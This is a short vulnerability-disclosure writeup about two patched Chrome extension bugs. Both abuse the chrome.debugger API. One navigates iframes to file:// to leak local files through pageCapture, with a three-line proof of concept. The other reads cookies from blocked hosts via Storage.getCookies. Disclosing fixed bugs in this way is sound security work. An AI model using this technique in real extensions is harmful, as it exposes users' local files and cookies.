Writeups

The chrome extension chrome.debugger https://developer.chrome.com/docs/extensions/reference/api/debugger API implies <all_urls> permission but should not grant access to the users file system or bypass enterprise policies.
However its a very powerful protocol by design with lots of features https://chromedevtools.github.io/devtools-protocol/

‘Page.navigate’ could navigate iframes to file:// when not enabled (Awarded $3000)

Extensions with both pageCapture and debugger permissions could read local file contents. This is because its possible to use Page.navigate to navigate an iframe to file:// when “Allow access to file URLs” is disabled exposing the files contents to the pageCapture API.

chrome.debugger.attach({tabId: <TARGET>}, '1.3', console.log);
chrome.debugger.sendCommand({tabId: <TARGET>}, 'Page.navigate', {frameId: <FRAME ID AS SEEN FROM EVENTS), url: 'file:///d:/demo.txt'}, console.log);
chrome.pageCapture.saveAsMHTML({tabId: 800972627}, console.log);

This issue was fixed in https://issues.chromium.org/40060173

Features bypass the runtime_blocked_hosts cookie protection (Awarded $3000)

Extensions where able to get cookies from a runtime_blocked_host using the chrome.debugger API via Storage.getCookies https://chromedevtools.github.io/devtools-protocol/tot/Storage/#method-getCookies and other protocol features.

Setup

Exploit

Using a browser extension with the debugger permission.

Improve this page